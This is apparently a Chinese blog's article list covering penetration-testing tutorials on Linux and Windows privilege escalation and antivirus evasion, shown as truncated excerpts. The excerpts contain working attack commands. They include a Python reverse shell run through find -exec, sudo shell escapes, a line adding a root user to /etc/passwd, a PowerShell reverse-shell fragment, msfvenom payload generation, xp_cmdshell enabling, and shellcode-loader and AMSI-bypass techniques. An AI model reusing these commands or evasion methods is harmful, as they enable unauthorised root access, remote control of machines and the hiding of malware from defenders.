- 博客(191)
- 收藏
- 关注
原创 WEB渗透Linux提权篇-SUID提权
$touch xxx$/usr/bin/find xxx –exec whoami \;$/usr/bin/find xxx –exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.filen
2024-09-06 23:22:17 201
原创 WEB渗透Linux提权篇-Sudo提权
>sudo -l 查看/home/user/.sudo_as_admin_successful>sudo zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash">sudo tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash>sudo strace –o /dev/null /bin/bash>sudo nmap –inter
2024-09-05 14:45:26 392
原创 WEB渗透Linux提权篇-通配符提权
存在一个定时压缩目录的任务 生成反向shell。即可返回shell 或使用sudoer。低权限登录 查看cron。
2024-09-05 14:40:08 301
原创 WEB渗透Linux提权篇-漏洞提权
检查执行命令所需时间>time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:ignite string:"ignite user" int32:1提前结束(多运行几次)>dbus-send --system --dest=org.freedes
2024-09-04 10:12:18 268
原创 WEB渗透Linux提权篇-查找辅助信息
>cat /etc/issue>cat /etc/*-release>cat /etc/lsb-release # Debian based>cat /etc/redhat-release # Redhat based>cat /proc/version>uname -a>uname -mrs>rpm -q kernel>dmesg | grep Linux>ls /boot | grep vmlinuz-
2024-09-04 09:56:35 299
原创 WEB渗透Linux提权篇-可写文件提权
$ls –lh /etc/passwd 若是任何用户可读写$perl -le 'print crypt("password@123","addedsalt")' 生成密码或php -r "print(crypt('aarti','123') . \"\n\");"或python -c 'import crypt; print crypt.crypt("pass", "$6$salt")'$echo "test:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bas
2024-09-04 09:50:51 489
原创 WEB渗透Linux提权篇-环境变量提权
编译>gcc demo.c -o shell>chmod u+s shell执行./shell 回显ps命令提权find / -perm -u=s -type f 2>/dev/null存在脚本/home/name/script/shell>cd /tmp>echo "/bin/bash" > ps>chmod 777 ps>echo $PATH>export PATH=/tmp:$PATH>cd /home/raj/script>./shell>whoami或使用copy命
2024-09-02 11:29:55 215
原创 WEB渗透Linux提权篇-提权工具合集
用于检查可执行文件属性的 bash 脚本(如 PIE、RELRO、PaX、Canaries、ASLR、Fortify Source)枚举基本系统信息并搜索常见的权限提升向量,例如世界可写文件、错误配置、明文密码和适用的漏洞利用。检查文件权限、cron 作业(如果可见)、弱凭据等。搞个web服务提供下载。
2024-09-02 11:26:22 2009
原创 WEB渗透Win提权篇-合集(下)
使用cmdkey列出机器上存储的凭据>cmdkey /listCurrently stored credentials: Target: Domain:interactive=WORKGROUP\Administrator Type: Domain Password User: WORKGROUP\Administrator可以使用runas的/savecred参数以使用保存的凭据。以下示例通过 SMB 共享调用远程可执行文件>runas /savecred /user:WORKGROUP\A
2024-09-01 11:28:18 455
原创 WEB渗透Win提权篇-合集(上)
Rogue Potatohttps://github.com/antonioCoco/RoguePotato要在远程机器上运行端口转发,必须使用端口 135 作为源端口socat tcp-listen:135,reuseaddr,fork tcp:10.0.0.3:9999在远程计算机上运行 RogueOxidResolver.exe如果您有防火墙限制,请使用此选项RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe"Rog
2024-09-01 11:26:05 527
原创 WEB渗透Win提权篇-PrintNightmare
https://github.com/cube0x0/CVE-2021-1675>python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll'>python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 'C:\addCube.dll'本地执行溢出>SharpPri
2024-08-30 22:49:49 720
原创 WEB渗透Win提权篇-Searchsploit
wmic qfe list full|findstr /i hotfixsysteminfo>temp.txt&(for %i in (KB2271195 KB2124261 KB2160329 KB2621440 KB2707511 KB2829361 KB2864063 KB3000061 KB3045171 KB3036220 KB3077657 KB3079904 KB3134228 KB3124280 KB3199135) do @type temp.txt|@find /i "%i"||
2024-08-30 22:48:49 677
原创 WEB渗透Win提权篇-白名单提权
>C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out:y.exe /unsafe C:\Users\y\Desktop\1.csusing System;using System.Net;using System.Linq;using System.Net.Sockets;us
2024-08-29 10:59:37 197
原创 WEB渗透Win提权篇-CVE-2020-1472
使用 IP 地址代替FQDN 用 Windows API 来强制 NTLM 重置密码为Waza1234/Waza1234/Waza1234/从 secretsdump 恢复密码 将本地注册表机密转储到最新版本时,secretsdump 将自动转储明文机器密码(十六进制编码)激活一个虚拟环境来安装impacket。查找 DC 的旧 NT 哈希。执行dcsync导出hash。从一个没加入域的机器测试。执行,并且设置密码为空。
2024-08-29 10:51:01 214
原创 WEB渗透Win提权篇-MSF提权
发现补丁>use post/windows/gather/enum_patches列举可用EXP>use post/multi/recon/local_exploit_suggester
2024-08-28 15:48:22 218
原创 WEB渗透Win提权篇-特权文件写入提权
此技巧不再适用于最新版本的 Windows 10 Insider Preview如果我们在 Windows 或某些第三方软件中发现了一个特权文件写入漏洞,可以将我们自己的windowscoredeviceinfo.dll复制到C:\Windows\Sytem32\,然后由 USO 服务加载,以NT AUTHORITY\System执行任意代码构建https://github.com/itm4n/UsoDllLoader选择发布配置和 x64 架构。构建解决方案。DLL .\x64\Release\
2024-08-28 15:45:12 156
原创 WEB渗透Win提权篇-PowerUp
检测有漏洞的服务在AbuseFunction中会显示利用语句。重启电脑后会新增用户admin查找可能劫持的进程查找环境变量中当前用户可修改的目录查找存在注册表中自动登录用户的平局查询trusted_service_path查询当前用户可修改的注册表开机启动项查询当前用户可修改的计划任务项查询系统中所有web.config文件中的明文密码。
2024-08-27 19:47:45 202
原创 WEB渗透Win提权篇-BypassUAC
提权工具合集包(免费分享): 夸克网盘分享WEB渗透Win提权篇-RDP&Firewall-CSDN博客WEB渗透Win提权篇-MSSQL-CSDN博客WEB渗透Win提权篇-MYSQL-udf-CSDN博客WEB渗透Win提权篇-AccountSpoofing-CSDN博客WEB渗透Win提权篇-弱权限提权-CSDN博客 DccwBypassUACCMSTPBypass-UACDLL hijackSilentClean
2024-08-27 19:43:26 270
原创 WEB渗透Win提权篇-弱权限提权
提权工具合集包: 夸克网盘分享WEB渗透Win提权篇-提权工具合集-CSDN博客WEB渗透Win提权篇-RDP&Firewall-CSDN博客WEB渗透Win提权篇-MSSQL-CSDN博客WEB渗透Win提权篇-MYSQL-udf-CSDN博客WEB渗透Win提权篇-AccountSpoofing-CSDN博客条件:服务帐号upnphost如果由于缺少依赖项而失败,请尝试以下命令。使用accesschk弱注册表权限检查有KEY_ALL_ACCESS权限的注册表项查询路
2024-08-26 21:57:53 244
原创 WEB渗透Win提权篇-提权工具合集
要运⾏ PowerUp,请启动 PowerShell 会话并使⽤ dot 加载脚本,请执⾏以下操。winPEAS 是⼀个⾮常强⼤的⼯具,它不仅积极寻找特权升级错误配置,⽽且还在。当使⽤命令⾏时,我们有 使⽤仍具有 /accepteula 命令⾏的旧版本选项。缺点是:程序的最新版本会⽣成⼀个 GUI"接受 EULA" 弹出窗⼝。您可以使⽤它来检查⽤户或组是否有权访问⽂件,⽬录,服务和注册表项。accesschk 是⼀个很旧的⼯具了,但我们依然可以尝试去⽤。Seatbelt 是⼀种枚举⼯具。
2024-08-26 21:34:34 2641
原创 WEB渗透Win提权篇-AccountSpoofing
https://github.com/cube0x0/noPac>noPac.exe scan -domain htb.local -user user -pass 'password123'>noPac.exe -domain htb.local -user domain_user -pass 'Password123!' /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt>noPac.exe -
2024-08-25 20:36:43 276
原创 WEB渗透Win提权篇-MSSQL
查询状态>select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' 存在返回1EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;exec sp_configure 'xp_cmdshell',1;reconfigure;exec maste
2024-08-24 01:07:15 243
原创 WEB渗透Win提权篇-RDP&Firewall
放行出去到远程8888端口的流量 netsh advfirewall firewall add rule name="88" protocol=TCP dir=out remoteport=8888 action=allow。放行远程8888端口进来的流量 netsh advfirewall firewall add rule name="88" protocol=TCP dir=in remoteport=8888 action=allow。本机开启3389远程连接的方法。注: 修改连接端口重启后生效。
2024-08-24 01:05:52 500
原创 WEB渗透免杀篇-绕过
在进程中分配空间(检索内存地址)。我们可以使用几个Win32 API执行这些步骤: OpenProcess() VirtualAllocEx() WriteProcessMemory() CreateRemoteThread() 正常情况下,我们将原始shellcode直接写入到内存中,但是如果AV /EDR检测到了Shellcode,它们肯定会发出警报 所以我们在二进制文件中使用可逆的方式把shellcode编码,再解码写入内存来规避防护。现在,我们将开始实现将为我们执行shellcode注入的C代码。
2024-08-22 21:07:34 637
原创 Windows-Server-2016/2019绕过WindowsDefender
该代码利用golang中的syscall包来调用NewLazyDLL 方法来加载Kernel32.dll,加载Kernel32.dll后,即可将其用于寻址和内存分配。由于代码存在许久,可能直接使用会被检测到,这里对其进行了修改,重命名所有变量,通过URL方式加载shellcode,为了绕过沙盒,添加了一些其他的参数,如果不存在参数则退出执行。Windows Server 2016和2019上的Microsoft Defender Antivirus自动将您注册为某些排除项,具体由您指定的服务器角色定义。
2024-08-22 21:00:32 470
原创 WEB渗透免杀篇-cshot远程shellcode
C_Shot是一种用C语言编写的攻击性安全工具,旨在通过HTTP / HTTPS下载远程shellcode二进制文件(.bin),注入并执行shellcode。1.shellcode注入其自己的进程 2.使用父进程欺骗将shellcode注入子进程 使用C_Shot之类的工具的好处是,我们要执行的恶意代码没有存储在二进制文件中,而是从远程位置检索,读入内存然后执行。对于本文中的所有示例,我将使用github托管shellcode。分阶段和无阶段的shellcode在使用欺骗父进程方法时都可以绕过av。
2024-08-21 14:00:16 260
原创 WEB渗透免杀篇-MSF免杀
msf生成图片格式>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f faw -o /root/1.png生成解决方案即可。#define _CRT_SECURE_NO_WARNINGS#include #include #include int main(void){ FILE* fp; size_t size;
2024-08-21 13:56:09 225
原创 WEB渗透免杀篇-Pezor免杀
使用inline_syscall内联注入shellcode,结合sgn,donut等项目,增加了一些反调试技巧。–h 这里测试下mimikatz,-sleep设置为2分钟,执行后需等两分钟 打包之前。
2024-08-20 16:59:47 240
原创 WEB渗透免杀篇-Golang免杀
参数解释: garble(混淆库): -tiny 删除额外信息 -literals 混淆文字 -seed=random base64编码的随机种子 go: -w 去掉调试信息,不能gdb调试了 -s 去掉符号表 -H windowsgui 隐藏执行窗口,不占用 cmd 终端。复制到aes-sc.go中的51行替换payload 运行aes-sc.go生成AES加密后的值。复制输出的值到go-sc.go中的73行替换payload 编译成exe可执行程序。
2024-08-20 16:57:32 757 1
原创 WEB渗透免杀篇-Bypass-AMSI
$stream = $client.GetStream()[byte[]]$bytes = 0..65535|%{0}$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserv
2024-08-19 18:23:31 275
原创 WEB渗透免杀篇-MSF+shellcode免杀
目前过火绒,不过360,可组合一下 Vs新建c++控制台程序 右键属性-》将MFC的使用选为在静态库中使用MFC 生成c格式shellcode粘贴进remote inject.cpp。生成的py文件使用py2exe编译执行 生成的cs文件使用csc.exe编译执行 生成的cpp文件使用vc6.0编译,去掉预编译头编译执行。正常执行结束进程msbuild会失去会话,以下保存bat执行 获得session后立刻迁移进程。生成项目 能成功上线,并开启calc进程。当前过不了火绒,360动态静态可过。
2024-08-16 11:57:35 425
原创 WEB渗透免杀篇-分块免杀
przdE.ReferencedAssemblies.AddRange(@("System.dll",[PsObject].Assembly.Location)) 变为 magic="Syst"+"em"+".dll";[DllImport("kernel32.dll")] 变为 [DllImport("ke"+"rne"+"l32.dll")] #可绕过赛门铁克。因为我没加汇编指令,中间这里直接按任意键跳过即可,懂的可以在开头添加一些指令,例如xor,inc,dec,add,sub,mov,nop等。
2024-08-15 08:52:32 348
原创 WEB渗透免杀篇-Powershell免杀
再混淆一下函数和变量 绕过执行命令的拦截 使用cs的参数欺骗。Powershell行为检测bypass。对函数,参数,变量进行混淆。
2024-08-15 08:47:21 327
原创 WEB渗透免杀篇-Python源码免杀
粘贴shellcode到shellcode+py.py中,在32位系统上安装python、py2exe、pyinstaller进入C:\Python27\Scripts目录使用命令把py打包为exe。粘贴shellcode到shellcode+c.py中,在32位系统上安装python、py2exe、pyinstaller进入C:\Python27\Scripts目录使用命令把py打包为exe。会在目录下生成dist文件夹,exe文件就在里面。会在目录下生成dist文件夹,exe文件就在里面。
2024-08-14 14:26:34 411
原创 WEB渗透免杀篇-C#源码免杀
Payload粘贴到InstallUtil-Shellcode.cs中使用csc编译。生成payload MSF监听需设置自动迁移进程。生成payload MSF监听需设置自动迁移进程。生成payload MSF监听需设置自动迁移进程。MSF启动监听 Payload粘贴到位置。粘贴payload后编译加密。与上文xor加密类似。
2024-08-14 14:19:06 265
网络安全之渗透测试20w字全套笔记
2024-08-25
蓝桥杯等程序设计竞赛专题挑战教程
2024-08-25
蓝桥杯LeeCode数据结构与算法资源
2024-08-25
全套免杀教程+免杀工具合集
2024-08-25
CTF线下赛AWD脚本合集
2024-08-25
渗透测试常用poc、工具集合
2024-01-06
护网面试题总结+安全工程师笔试问题
2024-01-06
网络安全零基础学习路线 v2024
2024-01-06
SRC技术文档汇总100套(2024最新版)
2024-01-06
CISP、NISP二级、CISE题库最新版(2024年1月更新)
2024-01-06
NISP一级题库,NISP二级题库,国家信息安全水平测试,网络安全证书(2024)
2024-01-06
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人